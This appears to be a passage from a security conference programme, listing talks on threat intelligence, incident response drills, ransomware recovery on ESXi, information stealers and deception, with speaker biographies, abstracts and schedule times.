- AR, ES | TLP:CLEAR
From TTPs to Deception: Crafting Strategies
Diego Staino (BASE4 Security, AR), Federico Pacheco (BASE4 Security, ES)
Cybersecurity professional with 14+ years of experience as IT and security consultant. Certified Incident Handler (ECIH) and Undergraduate education in "Security in ICTs and Communications" (IUPFA). Currently Cybersecurity Innovation Leader at BASE4 Security where he designs initiatives in various areas of cybersecurity that lead to the creation of new capabilities for internal areas of the organization or services and products for third parties. Full Profile: https://www.linkedin.com/in/diegostaino/
Cybersecurity professional with a background in electronic engineering and several industry-recognized certifications. 20+ years of teaching experience at the most prestigious universities in Argentina. Has worked in the public and private sectors, including regional roles in global companies. He is in charge of R&D+i at BASE4 Security. Full Profile: https://www.linkedin.com/in/federicopacheco/
Defining deception strategies in production environments is a challenge that requires a strategic approach. This session introduces a practical methodology for translating Tactics, Techniques, and Procedures (TTPs) into concrete deception activities applicable to real-world scenarios. We will explore a four-phase process: behavior extraction, criteria selection, mapping TTPs to deception activities, and storytelling design. Attendees will leave with an approach for analyzing cyber threats, identifying adversary behaviors, selecting appropriate deception criteria, and designing narratives to enhance their deception strategies. By the end of the session, participants will be equipped with a guide to begin developing an effective cyber deception plan.
June 23, 2025 11:00-11:35
- AT, AU | TLP:GREEN
From Unstructured CTI Reports to Yara/SPL via LLMs
Aaron Kaplan (independent / EC-DIGIT-CSIRC, AT), Jürgen Brandl (BMI, AT), Chris Horsley (Cosive, AU)
Aaron is currently working for EC-DIGIT-CSIRC where he focuses on how to leverage the power of Large Language Models (LLMs) for CTI purposes. Prior to joining EC-DIGIT-CSIRC, Aaron was employee #4 of CERT.at. He co-founded intelmq.org.
In the field of AI, Aaron co-founded deep-insights.ai, a medical AI research group focussing on delivering deep learning based classifiers for the rapid detection of lesions in the human body. He also co-chairs the AI Security SIG at FIRST.org. Aaron likes to come up with ideas which have a strong benefit for (digital) society as a whole and that scale up. He loves sharing knowledge and open source tools to automate stuff.
Jürgen Brandl is a senior cyber security analyst at the Federal Ministry of the Interior and has 10 years of experience working in incident response, protecting both governmental and critical infrastructure from cyber attacks. In his current role, he is researching and advocating for the need to use AI to face the emerging threat landscape.
Chris Horsley is the CTO and one of the co-founders of Cosive, a cybersecurity and CTI specialist consultancy based in Australia and New Zealand with a particular focus on security operations, IR, CTI practices, and tooling. He also enjoys experimenting with LLMs and CTI data formats like STIX and MISP and how to visualise and represent CTI concepts better.
He also has a long background in the international CSIRT community, which spanned roles including open source intelligence gathering, vulnerability disclosure handling, software and tooling development, malware analysis, and joint initiatives for national CSIRTs. Chris has previously worked as a security analyst for AusCERT, the national CSIRT at that time, and JPCERT/CC, the Japanese national CSIRT.
This talk builds on top of our research (presented at FIRSTCON 2024) on how to train and fine-tune a local LLM ("neuroCTI") for Cyber Threat Intel (CTI) reports. While the previous talk focused on making a local LLM "understand" CTI reports, this talk focuses on leveraging the previous successes. The presenters will show how to use a fine-tuned local LLM to extract relevant information from CTI reports and turn this info into search queries for your favorite SIEM. We believe achieving this task with a local LLM is important in IT security settings, since not all data may be shared with cloud based LLMs such as Openai's GPT-4*. We will share insights as well as failures from our journey and enable the audience to replicate our findings within their own organisation. All results will be made available as open source.
June 23, 2025 11:00-11:35
- US | TLP:CLEAR
From Zero to Prepared: Implementing a Weekly Incident Response Drill Program
Jeffrey Carpenter (Accuray, Inc., US)
Jeffrey Carpenter has dedicated more than 35 years to improving the state of information security in roles such as incident responder, product security officer, information security officer and leader. He currently is the deputy CISO at Accuray, a medical device manufacturer. Jeffrey spent two decades at the CERT® Coordination Center, based at Carnegie Mellon University's Software Engineering Institute and he also was Senior Director of Incident Response Consulting and Threat Intelligence at Dell Secureworks. Jeffrey has been inducted into the Incident Response Hall of Fame by the Forum of Incident Response and Security Teams (FIRST).
Many incident response teams lack the real-world incident experience needed to confidently respond to attacks. This presentation demonstrates how to implement a weekly cyber drill program to build muscle memory and enhance incident response skills within your team. We will showcase how realistic scenarios, injected challenges, and post-drill analysis can cultivate practical expertise and improve incident response playbooks. A key focus will be how to leverage Large Language Models (LLMs) like Google Gemini and ChatGPT to accelerate and streamline the drill creation process. Attendees will learn how to design a weekly drill program, use AI to generate content, and drive improvements in their incident response process. Leave with ready-to-use drills, prompts and actionable knowledge that will help improve your team's capability and confidence. Targeted at incident response leaders and managers, but valuable for all team members.
June 24, 2025 09:00-09:35
- SE | TLP:CLEAR
Guardians of the Hypervisor
Nicklas Keijser (Truesec, SE), Anders Olsson (Truesec, SE)
Nicklas Keijser is a Senior Threat Analyst at Truesec, a role that involves much reverse engineering and looking into all things malware. Nicklas is also a subject matter expert in industrial control systems and anything related to its security. He started his career programming PLCs, SCADA systems, and almost anything else possible within the industry. Before joining Truesec, Nicklas worked at the Swedish National CERT in the Swedish Civil Contingencies Agency.
Anders is a Senior Infrastructure Architect with more than 25 years of experience in design and implementation of IT infrastructure. He's one of only 301 people worldwide who have passed the VMware Certified Design Expert (VCDX) design and in-person panel defense, and he has also been awarded the VMware vExpert title every year from 2016 to present. Anders specializes in VMware vSphere security, covering both proactive security design and hardening as well as reactive incident response and forensics work.
All ransomware actors now have the capability to encrypt hypervisors, which has led to some of the biggest attacks and has brought down whole organisations. This talk will give in-depth insight into how these attacks are performed and how to protect against them, but also how detection and response can be accomplished so the attacks can be stopped, even though it is not possible to install any agents on ESXi and vSphere.
June 26, 2025 09:45-10:20
- DK | TLP:RED
I Got 99 Problems But a Decryptor Ain't One: How to Save $1.5 Million on Ransom Via Manual Recovery of Encrypted VMs
Anton Kalinin (Principal Security Consultant at CSIS Security Group A/S, FIRST member, DK)
Anton has over 13 years of experience in the cybersecurity field and has a wide area of expertise, including malware analysis, digital forensics, and incident response. He joined Kaspersky in 2011 as a malware analyst. He spent seven years at Kaspersky and held different positions across the company, such as senior digital forensics analyst and security researcher, prior to moving to Sophos. During his Sophos years, Anton was working on the analysis and detection of emerging threats and in-house sandbox development to provide better detection capabilities for the customers. At Yandex, he was a part of the SOC team performing a variety of tasks such as incident response and threat hunting. In addition, he worked closely with system administrators and various service teams to improve network visibility and make it easier for security engineers to catch suspicious activity inside the network. Currently, Anton performs full-cycle incident response as a Principal Security Consultant at CSIS Security Group.
There are plenty of resources on how to prepare for, investigate and recover from critical incidents such as a ransomware attack; they are one of the most common attacks incident responders deal with. However, the resources are high-level, provide very few technical details or rely on adequate disaster recovery preparations. With modern ransomware attacks targeting hypervisors more frequently, it is important for defenders to understand what the possible options are for recovery beyond some of the typical responses of paying a ransom or standing up a new environment. This research was carried out during the recovery stage of a recent incident in a customer's environment. During the research, several tools were identified which could aid an organization's recovery efforts, but they have limited compatibility with ESXi hosts, so we had to develop a solution. The talk aims to provide hands-on experience of the manual recovery of partially encrypted Virtual Machines on an ESXi server and provide a step-by-step guide on how to recover.
The talk is aimed to cover the following topics:
- Foundational knowledge you need to perform recovery of partially encrypted VMs by yourself (Virtual Machine Disks (VMDK) and partition table basics)
- Step-by-step walkthrough of the actual case and the problems we overcame
- Hands-on approach to real world recovery and the difficulties which may arise
- How to automate the process of recovery
We will conclude with lessons learned from the research and the case we faced, and limitations of the approach.
June 24, 2025 09:45-10:20
- NO | TLP:CLEAR
Incident Preparedness Takeaways from 5000 Exercise Participants
Erlend Andreas Gjære (Secure Practice, NO)
Erlend Andreas Gjære has studied security and people for 15 years, including six years as a research scientist, with a focus on training, awareness and culture, behavior and incident response. In 2017, he became a tech-founder at Secure Practice, to help people with digital security at scale. He has delivered more than one hundred preparedness exercises across Norway and Denmark, through a tour concept of free events to increase cyber preparedness among thousands of small and medium enterprises, with support from the European Cybersecurity Competence Centre (ECCC), and winning the European Digital Skills Award 2024 for this effort.
Preparedness exercises allow people to engage first-hand with a cyber incident scenario, seeing how they respond to various situations and dilemmas. They help us learn how to better respond to a crisis, but will often highlight risks and vulnerabilities which are possible to immediately convert to preventive mitigations. When multiple companies exercise together, participants can also learn from each other, and even make new security friends. This talk summarizes what we've learned through national cyber exercise tours in Norway and Denmark, where 5000 people who are responsible for IT, security and preparedness from 3500 companies have participated since last year. We will describe key findings from discussions and input across a wide range of sectors, roles and locations participating. You will also learn useful tips and tricks for facilitating your own exercises, to create awareness and good learning moments for all of your colleagues -- whether they are part of an incident response team or not.
June 24, 2025 09:45-10:20
- CA, US | TLP:CLEAR
Inside the Information Stealer Ecosystem: From Compromise to Countermeasure
Olivier Bilodeau (Flare, CA), Nick Ascoli (Flare, US)
Olivier Bilodeau, a principal researcher at Flare, brings 12+ years of cutting-edge infosec expertise in honeypot operations, binary reverse-engineering, and RDP interception. A passionate communicator, Olivier has spoken at conferences like BlackHat, DEFCON, SecTor, Derbycon, and more. Invested in his community, he co-organizes MontréHack, is NorthSec's President, and runs its Hacker Jeopardy.
Nick Ascoli is a Senior Product Strategist at Flare and an experienced threat researcher who is recognized for his expertise in data leaks, reconnaissance, and detection engineering. Nick is an active member of the cybersecurity community contributing to open-source projects, regularly appearing on podcasts (Cyberwire, Simply Cyber, etc.) and sharing research and insights at conferences (GrrCON, B-Sides, DEFCON Villages, SANS, etc.)
Modern information stealers have evolved far beyond simple credential harvesters into sophisticated tools that capture complete digital fingerprints of their victims. This technical deep-dive unveils groundbreaking research into stealer architecture, attack chains, and defensive countermeasures. Through analysis of real-world compromise scenarios, including desktop screenshots captured at infection moments, we reveal how threat actors leverage compromised ad networks and trojanized software for mass deployment. The presentation examines the Operation Magnus takedown, a collaborative effort with ESET and law enforcement, demonstrating the complex infrastructure behind professional criminal enterprises. Building on hands-on experience with stealer log analysis, we detail how modern threats bypass multi-factor authentication, compromise password managers, and extract cryptocurrency wallets. We examine Chrome's application-bound encryption and why, although already circumvented, it creates new detection opportunities. The session concludes with practical defensive strategies and the release of two community resources: a PowerShell framework for automated credential testing against Entra ID and a curated dataset of stealer logs for security research. This presentation equips security practitioners with concrete insights and tools to defend against one of today's most consequential yet underexamined threats.
June 25, 2025 10:30-11:05
- LU BE TLP:CLEAR
It Wasn't Me - Sharing Threat Intel Anonymously using Abracadabra
Andras Iklody (CIRCL, LU), Trey Darley (Liaison, BE)
Andras Iklody works at the Luxembourgian Computer Security Incident Response Team (CSIRT) CIRCL as a software engineer and has been leading the development of the MISP core since early 2013. He is a firm believer that there are no problems that cannot be tackled by building the right tool.
Trey Darley has been a long-standing member of the FIRST community, and has served a variety of volunteer roles, including a term on the FIRST board, during which he co-founded the FIRST standards committee. Trey is well known for his work on open cybersecurity standards like STIX/TAXII and others. He's also been aligned with the Langsec faction for many years. Trey's patron saints are Grace Hopper, Evi Nemeth, and Paul Erdös.
Sharing threat information has come a long way - we have thriving communities such as the FIRST community, national networks, industry groups all engaged in sharing their research, incident analyses as well as high level threat intelligence. However, whilst there is plenty of sharing happening today, a large part of the community still isn't able to contribute out of fear of reputation loss or generally the responsibility that comes with attaching the shared information to one's employer or self. In order to offer an (open-source) solution to this, as well as various new reporting duties that have emerged, we'd like to introduce Abracadabra.
June 24, 2025 13:30-14:05
- NO TLP:CLEAR
Keynote Address: Unpacking the Human Factor: Navigating Individual, Socio-Technical, and Systemic Challenges in Incident Investigations
Nina Sunde (Norwegian Police University College, NO)
Nina Sunde is a Police Superintendent with a PhD in criminology and works as a researcher and lecturer at The Norwegian Police University College. She co-leads the Police and Technology research group and is actively involved in research projects, including the EU Horizon-funded Clarus project and EB-CRIME. Her research primarily focuses on investigation practices related to digital evidence and cybercrime, with an emphasis on quality assurance and error mitigation in digital forensic investigations. With 25 years of experience in the Norwegian Police, where she specialized in cybercrime investigations, Sunde brings extensive practical expertise to her academic work.
June 23, 2025 09:30-10:30
- BE TLP:GREEN
Keypocalypse
Emilien Le Jamtel (CERT-EU, BE)
Emilien Le Jamtel has been a cyber security expert for the last 15 years. After building up his technical skills in penetration testing and red teaming, he joined CERT-EU in 2014 as a Threat Intelligence Analyst before quickly moving to CERT-EU's Digital Forensics and Incident Response team. Since 2021, he has been leading the DevSecOps team responsible for the infrastructure and tooling used by CERT-EU staff to deliver a wide range of services to all the European Union entities. Emilien is a regular speaker at cybersecurity conferences such as FIRST, Hack.lu, Botconf, and NorthSec.
Mechanical keyboards are trendy and cherished not only by the gaming community but also among IT professionals. While they offer advanced customisation and productivity features, they can also introduce new risks for organisations. In this talk, we will dive into the fascinating world of mechanical keyboard enthusiasts and explore how these devices can be abused by threat actors. Topics will include threat modelling, supply chain attacks, firmware extraction, and a zero-trust approach to keyboard firmware security.
June 26, 2025 15:00-15:35
- TLP:CLEAR
Lazarus Group Evolved Their Infection Chain with Old and New Malware
Sojun Ryu (Kaspersky)
Sojun Ryu graduated from the 'Next Generation of Top Security Leader Program' (Best of Best, BoB) at the Korea Information Technology Institute (KITRI) in 2013, and holds a Master's degree in information security from Sungkyunkwan University in Korea. Sojun worked at KrCERT/CC for seven years, analyzing malware and responding to incidents, and is one of the authors of "Operation Bookcodes" published by KrCERT/CC in 2020. After moving to S2W, a cybersecurity startup in Korea, he expanded his coverage during his time as a team leader, focusing on not only APT but also on cybercrime. Sojun is now a member of GReAT at Kaspersky and is very focused on APT research.
Over recent years, the Lazarus APT group has distributed their own malware by leveraging fraudulent job opportunities targeting employees in various industries, including defense, aerospace, cryptocurrency, and other global sectors. This attack campaign is called the DeathNote campaign and is also referred to as "Operation DreamJob". During our recent investigation, we observed that the Lazarus group had delivered archive files containing malicious files to at least two employees who were engaged with the same organization over the course of one month. The threat actor used a fake job offer sent by an impersonated recruiter. After looking into the attack, we were able to uncover a detailed infection chain, giving us insight into their intentions. Although they used known strategies and malware for initial infiltration, they intentionally introduced new malware to avoid detection by leveraging the fact that the malware hasn't been used before. They have also stepped up their efforts to actively evade detection by exploiting legitimately compromised websites as C2 servers.
June 26, 2025 11:30-12:05
- JP TLP:CLEAR
Maximizing the Potential of AWS-WAF: Fully Automating threat detection with Custom Managed Rules and Proprietary Threat Intelligence
Masato Suzuki (NTT-ME CORPORATION, JP), Shota Sugawara (NTT-ME CORPORATION, JP), Atsushi Kobayashi (NTT-ME CORPORATION, JP), Hirofumi Kawauchi (NTT-ME CORPORATION, JP)
Masato Suzuki is engaged in service development and maintenance to provide Managed Security Services (MSS) for enterprises and municipalities. His experience includes researching advanced log analysis methods for ISPs and enhancing OSINT technologies for NTT Group's CSIRT as part of NTT-CERT. During the Tokyo Olympic and Paralympic Games, he conducted vulnerability testing and security audits, ensuring the security configuration of over 10,000 network and security devices.
Shota Sugawara leads the development and operation of Managed Security Services (MSS) for enterprises and municipalities, focusing on cloud security operations using AWS. His experience includes conducting vulnerability testing and ensuring the security of hundreds of IT systems owned by NTT East, Japan's largest telecom carrier. He is also actively involved in CTF competitions, specializing in Pwnable challenges.
Dr. Atsushi Kobayashi, SOC Manager at NTT-ME, has over 5 years of experience in cybersecurity. He was previously involved in research on traffic monitoring technology at NTT Laboratories, participated in the standardization work of IPFIX at IETF, and then wrote RFC5982, 6183, 7119, etc. After transferring to NTT East, he was engaged in the planning and maintenance of internal networks, integrating dozens of AD servers, renewing a VDI infrastructure and file servers for 50,000 users.
Dr. Hirofumi Kawauchi, SOC Manager at NTT-ME, has over 10 years of experience in cybersecurity. He previously led incident response and vulnerability management at NTT East, Japan's largest telecom carrier. He also worked as a SOC analyst and threat intelligence developer at NTT Security US. Upon returning to Japan, he launched NTT East's Managed Security Service as a tech lead, developing SOC infrastructure. He actively contributes to Japan's telecom industry and cybersecurity education through ICT-ISAC JAPAN, university lectures, and industry events. He has also presented at BSides Las Vegas. He holds CISSP, GCFA, GPEN, and AWS-SAP/SCS certifications. NTT Group Certified Security Principal, PhD in Engineering.
In our SOC, we leverage AWS-WAF to protect numerous client web servers, but we have taken it a step further. By integrating it with our proprietary threat intelligence, we have fully automated the process -- from detecting attacks to investigating and blocking them. In this presentation, we will share how we achieved this through: 1) Setting up custom rules to make AWS-WAF operations more effective and efficient, 2) Implementing an automated detection and blocking system, and 3) Presenting examples of these functions successfully countering actual cyber threats. This presentation will provide practical and actionable insights to enhance your day-to-day security operations.
June 24, 2025 15:00-15:35
- DE TLP:CLEAR
Modern MISP
Konstantin Zangerle (KIT-CERT, DE)
Konstantin Zangerle has been a member of KIT-CERT since November 2020. He started programming in Python when the new thing was called Python 3000. After studying computer science in Karlsruhe, he loves to implement automation at KIT-CERT. In his job, he is fascinated by the fusion of infosec and law.
In 2023 he started to supervise multiple groups of students to implement Modern MISP. Until now, 35 students have been working on the project.
Efficient threat intelligence sharing across organisations is crucial for CSIRTs. Different software solutions are available, with MISP being the most commonly used tool. However, using MISP also comes with some challenges and limitations, e.g. MISP only supports MySQL/MariaDB and the OpenAPI specification is incomplete and in parts incorrect. Therefore, in Oct 2023, KIT-CERT started a reimplementation called Modern MISP that serves as a direct replacement, i.e. an existing database can be used, and the API provides the same endpoints. Modern MISP uses a modern software architecture with well-maintained libraries like FastAPI, Pydantic, SQLAlchemy, Svelte, and Celery. Currently Modern MISP supports CRUD operations for Events, Attributes, Galaxies, Tags, and Users, and will most likely be production ready in April 2025. As Modern MISP tries to focus on widely used features, not all features of MISP will be implemented in Modern MISP. We provide an overview of which features are already implemented in Modern MISP, the ongoing development and the plans for the next winter semester starting in October.
June 24, 2025 10:45-11:20
- AU TLP:CLEAR
Navigating the Threat Actor Maze: A Tool for Mapping Names, Families and Insights
Dave Matthews (Avast (Gen Digital), AU)
After getting his PhD in Mathematics, Dave spent the next 25 years consulting for the Australian Government, primarily working with Defence, Intelligence, and Law Enforcement, before moving to CrowdStrike and Gen Digital (which was formed from the merger of Avira, Avast, and NortonLifelock). He has continually worked in Incident Response and Forensics and has had the privilege of helping people during their worst days at work.
He has experience with all aspects of cybersecurity, ranging from attack and defence to incident response and security capability development. He is particularly passionate about digital forensics and incident response, helping people prevent and recover from attacks and breaking down barriers to sharing information.
Overwhelmed with the myriad of Threat Actor names? Fancy Bear vs Forest Blizzard? Wicked Panda vs BRONZE ATLAS? What about malware families? CageyChameleon vs Cabbage RAT? Qakbot vs Pinkslipbot? In this talk, we release a free tool that enables mapping between different Threat Actor naming conventions and malware families. We demonstrate its use and show how it allows for easy offline search of threat actors and published research. It provides rapid access to Threat Actor and malware family information - undoubtedly helpful for your intelligence analysis, research and operational work.
June 26, 2025 09:45-10:20
- US TLP:CLEAR
Only Seeing Stars: Enabling the Open Source Scripting Community with OCSF
Michael Bunner (REI, US)
I have worked in IT for telecommunications, forestry, healthcare, retail and then 12 years in critical infrastructure where I built and led Network Operations Center and Infrastructure Observability teams. Automation has always been part of every role I've ever had, ultimately performing it full-time on an "Automation Factory" where my favorite use-cases were cybersecurity. Security automation is not easy, or always obvious, but was the most rewarding. Automation is not just about doing things faster or more often, but how we can shift our focus to more meaningful work only humans can do. Mike Bunner lives in Seattle, WA, USA and currently works as a Senior Security Automation Engineer at a large outdoor retailer. When he's not automating, you'll find him skiing year-round on one of the region's many volcanoes.
Do you have more starred repos than you have time to think about? Are you a script or content builder seeing friction with integration and adoption of your work? Community software is innovative, responds quickly to emerging issues and is immediately accessible. But it's extremely disparate and operates ad-hoc. SOAR attempts to solve this with closed ecosystems, but at the cost of vendor lock-in. In this presentation we will demonstrate how we as script builders, implementers and data providers can build a more cohesive open source ecosystem with the adoption of Open Cybersecurity Schema Framework (OCSF) and Elastic Common Schema (ECS). Adoption of a standard schema brings your work into a predictable ecosystem and production readiness. Standards allow us to chain our tooling with less integration overhead, increasing the likelihood of seeing our tools put into production. See how a single object in OCSF can enable automation across threat hunting, EDR, software removal, email gateways, firewalls, and 3rd party registries.
June 27, 2025 10:30-11:05
- CA TLP:AMBER
Persona Theory: Infiltration & Deception of Emerging Threat Groups
Tammy Harper (Flare, CA)
Tammy is a Senior Threat Intelligence Researcher and Certified Dark Web Investigator at Flare. She is a contributor and volunteer threat intelligence researcher for the open-source project RansomLook. When not working on threat intelligence, she listens to techno and ambient music. Her other hobbies include street and nature photography, reading, camping, hiking, and learning about theoretical astrophysics, hypothetical stars, and exotic forms of matter.
This talk explores various techniques, tactics, and psychological models used to infiltrate emerging threat actor groups. We will examine the process of target identification and discuss when it is appropriate to attempt infiltration. Additionally, we take a closer look at the concept of probing the enemy and the idea of weaponizing new relationship energy (NRE), which can be effective at destabilizing individuals and placing them outside of their comfort zones. An important aspect of Persona Theory is not only what we write but also how we present it. Stylometric analysis can be particularly useful in this area. We will compare transliteration and translation (both human and machine) to understand how to pass as a native speaker.
June 24, 2025 14:15-14:50
- US GB JP TLP:CLEAR
Pivoting To Resilience: Disruptive Incidents And How We Prepare For Them
Tom Millar (CISA, US), Eireann Leverett (Killara Cyber, GB), Wendy Nather (None, US), Hendrik Adrian (LACERT, JP)
Mr. Millar has served in CISA since 2009, working to strengthen the nation's cyber defenses and resilience against emerging threats. His work has included increasing the level of public, private and international partner engagement, and supporting initiatives to improve information sharing, such as the standardization of the Traffic Light Protocol. As the Branch Chief of Cyber Resilience within the Cyber Security Division, he oversees CISA's architectural cybersecurity assessments, the Cybersecurity Performance Goals program, and training and standards for assessment performance. Prior to his cybersecurity career, he served as a linguist with the 22nd Intelligence Squadron of the United States Air Force. Mr. Millar holds a Master's of Science from the George Washington University and is a Distinguished Graduate of the National Defense University's College of Information and Cyberspace.
Eireann Leverett is the CTO of Killara Cyber, and a long-time collaborator with FIRST. He has risen through the roles of penetration tester, incident responder, researcher, and risk analyst to his current role. He has written many articles and one book, and has a deep interest in critical infrastructure, technology and risk, and catastrophe economics. He's like the little kid on this panel of international experts, and excited to be at the table!
Wendy Nather has been working in cybersecurity for over 25 years. She was previously the Director of Advisory CISOs at Duo Security, Research Director at the Retail ISAC, and Research Director of the Information Security Practice at 451 Research. Wendy led IT security for the EMEA region of the investment banking division of Swiss Bank Corporation (now UBS), and served as CISO of the Texas Education Agency. She was inducted into the Infosecurity Europe Hall of Fame in 2021. Wendy serves on the board of directors for Sightline Security, is on the steering committee for the IST Ransomware Task Force, and is a Senior Fellow at the Atlantic Council's Cyber Statecraft Initiative.
Hendrik Adrian is the representative of FIRST Team LACERT and co-chair of the FIRST CTI SIG and FIRST NETSEC; he works as a senior cyber threat intrusion analyst at Cyber Emergency Center. Hendrik supports the Japanese government in various security education activities at IPA, i.e. Security Camp and CyberCREST, and is putting more effort into national and international security communities as an active lecturer and speaker at various conferences. His malware analysis contributions to the security community are listed on Wikipedia at https://en.wikipedia.org/wiki/MalwareMustDie
As threat actors become increasingly focused on disruptive incidents (ransomware being only one example) and such incidents increasingly become a matter of "when, not if," defenders must be increasingly prepared not only to rapidly minimize harm, but to quickly and safely recover after a disruption. This panel of experts from around the world will discuss lessons learned in cyber resiliency, including supply chain risk management, cyber hygiene, trustworthy ad hoc side channels, individual versus collective resilience (and the need for stronger collaboration), metrics for assessing resilience, and more. In addition, panelists will have an opportunity to share "war stories" of cyber resilience in the current threat context, so that all attendees can learn from the triumphs of other resilient teams.
June 24, 2025 10:45-12:05
- JP TW TLP:AMBER
PSIRT 2.0: Revolutionizing Product Security with the Generative AI Strategy - Approach for Empowering Product Cyber Resilience and PSIRT Operation
Hikohiro Lin (GMO Cybersecurity by IERAE, Inc., JP), Ken Lee (Independent Security Advisor, TW), Kosuke Ito (Product Security Governance Advisor, JP)
Hikohiro Lin had been in charge of Product Security at Panasonic headquarters for over 15 years. He led several projects, including devising and deploying security test methods and risk assessments for IoT devices, formulating product security standard rules and guidelines, building a global product security system, formulating head office product security strategies, establishing Panasonic Cyber Security Lab for future cybersecurity research and a product-focused security incident response team, etc. He had served as Head of Panasonic PSIRT, Head of Product Security at Panasonic Global, and Director of Panasonic Cyber Security Laboratory. He has also received the (ISC)² ISLA (Information Security Leadership Achievement) APAC Senior Information Security Professional 2018 Showcased Honoree and Community Service Star. He is a Review Board member of HITCON and HITB (Hack In The Box) and a frequent cyber security speaker at many international conferences such as Black Hat, CODE BLUE, Kaspersky Security Analyst Summit (SAS), HITCON and government-invited roundtables as a panelist. He is currently appointed Sr. Executive Officer of GMO Cybersecurity by IERAE, Inc.
Ken Lee is a security professional who serves as both an Independent Security Advisor and a Security Consultant at Amazon Web Services. He provides vulnerability response and cloud security governance consulting expertise in his independent role. Prior to AWS, Ken was the Product Security Officer at Synology, where he led the Bug Bounty Program and Security Incident Response Team, overseeing critical security operations across the organization. Ken's industry leadership includes serving on the program committee of the 36th Annual FIRST Conference. He has been an active contributor to the security community, sharing his expertise in Product Security and CVE Program management through speaking engagements and community initiatives.
Kosuke Ito is an IoT security expert with over 15 years of experience and was the first PSIRT leader founding the product security activities at JVCKENWOOD Corp. before joining GMO Cybersecurity by IERAE. He led several projects to found the basic security activities, including formulating corporate product security policy, strategies and product security standard rules and guidelines including deployment of security test methods and risk assessments for IoT devices, formulating a product security incident response system (PSIRT) and guidelines, and developing product security educational materials and delivering seminars group-wide, etc. He played a key role in promoting group-wide product security at JVCKENWOOD. He also founded a manufacturing industry-wide product security promotion council and played a key role in developing the IoT security certification program, the first in Japan.
As organizations grapple with increasingly complex software supply chains and an exponential rise in security vulnerabilities, traditional PSIRT operations are becoming unsustainable. The challenge is particularly acute for organizations managing IoT devices and embedded systems, where vulnerability management requires coordinated efforts across multiple stakeholders and complex supply chains. Following our previous analysis of the manufacturing industry's cybersecurity readiness presented at FIRSTCON 2024, this session presents PSIRT 2.0, a strategic solution addressing the key challenges identified in our survey. With approximately 40% of manufacturers struggling with vulnerability management and resource constraints, there's a clear need for a more efficient and scalable approach to product security. PSIRT 2.0 represents a paradigm shift from traditional manual operations to an intelligent, automated platform enabling organizations to manage product security across their supply chains effectively. This session will explore how this evolution addresses the manufacturers' specific challenges, particularly in meeting new regulatory requirements and managing security throughout the product life cycle. Building on real-world insights from manufacturers, we'll demonstrate how PSIRT 2.0 can help organizations transform their product security operations while optimizing resources and improving supply chain collaboration.
June 27, 2025 10:30-11:05
- BE TLP:CLEAR
RE(HACK)T: Open-Sourcing a Boardgame for User Awareness
Emilien Le Jamtel (CERT-EU, BE), Francien Giebels (CERT-EU, BE), Marton Szabo (CERT-EU, BE)
Emilien Le Jamtel has been a cyber security expert for the last 15 years. After building up his technical skills in penetration testing and red teaming, he joined CERT-EU in 2014 as a Threat Intelligence Analyst before quickly moving to CERT-EU's Digital Forensics and Incident Response team. Since 2021, he has been leading the DevSecOps team responsible for the infrastructure and tooling used by CERT-EU staff to deliver a wide range of services to all the European Union entities. Emilien is a regular speaker at cybersecurity conferences such as FIRST, Hack.lu, Botconf, and NorthSec.
Francien has a multidisciplinary and legal background with a focus on cybersecurity law and policy. She began her European Commission journey as a trainee working on the Cyber Resilience Act and NIS2. For the past 1.5 years at CERT-EU, Francien has worked on implementing the recently enacted cybersecurity regulation and addressing legal questions arising from CERT-EU's operations.
Marton holds an IT engineering degree and began his career as a sysadmin before transitioning into cybersecurity. With over 15 years of experience, including 10 years working with Union entities, Marton is committed to contributing to a safer cyberspace. He currently works in the Security Consultation team of CERT-EU, whose tasks include, among many others, raising cybersecurity awareness among the staff of the European Union entities.
In 2020, CERT-EU created RE(HACK)T, a board game designed to support security awareness sessions for European Union entities. After several years of successfully conducting awareness sessions with dozens of users and distributing the game to hundreds of colleagues across EU organisations, CERT-EU decided to open-source all game files and assets. This initiative aims to help other organisations enhance their security awareness efforts. In this talk, we will introduce the game, explain its rules and assets, and share insights into the open-sourcing process, including the selected licence. Finally, we will share lessons learned from delivering awareness sessions to EU entity users, providing practical tips and future improvement ideas.
June 24, 2025 15:00-15:35
- US TLP:AMBER
Response via Prevention Engineering
Steve McKinney (Stripe, US), Lauren Tam (Stripe, US)
Steve is a tech lead within Stripe's Security Analytics and Detection team focused on scaling detection and response. He started his career 15+ years ago at Cisco in security engineering, architecture, and solving large scale threat analytics problems. When not working, he enjoys hiking, hacking on side projects, and woodworking.
Lauren is a program manager supporting Stripe's security team focused on supporting complex, large-scale work. Lauren has been doing security related work for nearly 10 years starting as an auditor then moving into the GRC space. When she's not thinking about security, you'll probably find her reading or doing ceramics.
Over the past two years, Stripe leveraged a prevention-first approach to harden our laptops. We combined insights from response investigations and known threat actor tactics, techniques, and procedures (TTPs) to systematically eliminate classes of attack techniques. By focusing on prevention, Stripe has reduced workload on analysts, eliminated the need for some detection mechanisms, minimized response toil, and freed up time to expand capabilities. This talk will cover our work with Chrome and macOS, discussing how we went from idea to production rollout while prioritizing minimal friction for employees. We will touch on several projects, but focus on allowlisting for Chrome extensions and macOS applications. Attendees will gain insight into how Stripe successfully implemented these changes with a data driven approach coupled with building trust and relationships across multiple teams and the company at large. We will talk about what went well, what we learned, and what changed along the way.
June 24, 2025 09:00-09:35
- US TLP:CLEAR
Revolutionizing Malware Analysis with Agentic AI: Lessons and Innovations
Justin Page (Booz Allen Hamilton, US)
Justin Page is a leader in cybersecurity innovation and the head of Booz Allen Hamilton's DarkLabs Applied Research, with over 20 years of experience in delivering advanced solutions to complex security challenges. He and his team developed multiple agentic systems for cybersecurity challenges from compliance to detection and automated static reverse engineering. His expertise includes intrusion analysis, malware analysis, threat hunting, and cyber threat intelligence against Nation-State Advanced Persistent Threats (APTs) across government and commercial sectors.
Malware analysis is critical for defending against cyber threats, but traditional approaches are often too slow and resource-intensive for modern needs. This talk explores how agentic AI can transform malware reverse engineering by automating repetitive tasks, improving scalability, and delivering actionable insights more efficiently. Drawing on the experience of designing and implementing an AI-driven system for malware analysis, we'll share key lessons learned, including best practices for agent collaboration, system scalability, and integration with existing tools. Attendees will gain practical strategies for applying these concepts in their own environments, as well as insights into the future of AI in cybersecurity. This session is ideal for professionals interested in enhancing malware analysis workflows and advancing their understanding of AI applications in security.
June 26, 2025 13:30-14:05
- NL TLP:CLEAR
Routing Security for Enterprises: Secure Your Supply Chain
Andrei Robachevsky (Global Cyber Alliance, NL)
